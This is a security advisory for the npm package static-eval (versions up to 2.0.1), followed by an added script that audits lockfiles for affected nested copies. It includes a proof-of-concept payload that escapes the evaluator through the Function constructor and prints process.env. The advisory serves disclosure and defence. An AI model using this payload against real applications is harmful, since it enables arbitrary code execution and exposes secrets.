
Sandbox Breakout / Arbitrary Code Execution in static-eval

Affected package: npm:static-eval (PURL: pkg:npm/static-eval)
Affected versions: <= 2.0.1
Fixed versions: 2.0.2
Usage: 109 dependent packages, 132,071 dependent repositories, 19,020,649 downloads last month

Affected Version Ranges

All affected versions

0.0.0, 0.1.0, 0.1.1, 0.2.0, 0.2.1, 0.2.2, 0.2.3, 0.2.4, 1.0.0, 1.1.0, 1.1.1, 2.0.0, 2.0.1

All unaffected versions

2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1

Versions of static-eval prior to 2.0.2 pass untrusted user input directly to the global Function constructor, resulting in arbitrary code execution when user input is parsed and evaluated via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;

// Payload demonstrating the flaw: in static-eval <= 2.0.1 the evaluated
// expression can reach the global Function constructor, so the string
// argument is executed as ordinary JavaScript instead of being evaluated statically.
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()';
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));

Recommendation

Upgrade to version 2.0.2 or later.
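As an added defensive check (not part of the advisory or the static-eval project), the following script flags any copy of static-eval in a package-lock.json v2/v3 style "packages" map whose version falls in the affected range (<= 2.0.1, fixed in 2.0.2), including nested copies pulled in by other dependencies. The lockfile content is constructed for the example; the version comparison is a minimal MAJOR.MINOR.PATCH comparison rather than the full semver grammar.

```javascript
// Added example: audit a lockfile for affected static-eval versions.
// Assumptions: package-lock v2/v3 layout ("packages" keyed by install path);
// the sample lockfile below is constructed, not taken from a real project.

// Parse "MAJOR.MINOR.PATCH" (leading "v" and any "-prerelease"/"+build"
// suffix are ignored) into numeric parts. Unparseable input returns null.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) return null;
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

// Compare two parsed versions: -1 if a < b, 0 if equal, 1 if a > b.
function compareVersions(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

// Range from the advisory: every version below 2.0.2 is affected.
const FIXED_VERSION = [2, 0, 2];

// A version that cannot be parsed is treated as affected (fail closed),
// so a malformed lockfile entry is surfaced rather than silently skipped.
function isAffected(version) {
  const parsed = parseVersion(version);
  if (!parsed) return true;
  return compareVersions(parsed, FIXED_VERSION) < 0;
}

// Walk the "packages" map and return every static-eval entry, at any
// nesting depth, whose version is in the affected range.
function findAffected(lockfile) {
  const findings = [];
  for (const [path, meta] of Object.entries(lockfile.packages || {})) {
    // Install paths look like "node_modules/foo/node_modules/static-eval".
    if (!path.endsWith('node_modules/static-eval')) continue;
    if (isAffected(meta.version)) {
      findings.push({ path, version: meta.version, fixedIn: '2.0.2' });
    }
  }
  return findings;
}

// Constructed sample: the top-level copy is fixed, but a plugin pins an
// affected nested copy, which is the case a shallow check would miss.
const SAMPLE_LOCKFILE = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', version: '1.0.0' },
    'node_modules/static-eval': { version: '2.0.2' },
    'node_modules/some-plugin': { version: '0.3.0' },
    'node_modules/some-plugin/node_modules/static-eval': { version: '2.0.1' },
  },
};

console.log(findAffected(SAMPLE_LOCKFILE));
```

The nested-copy case is the one worth remembering: upgrading the direct dependency to 2.0.2 does not help if another package still pins an older static-eval underneath it, so the check walks every install path rather than only the top-level entry.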
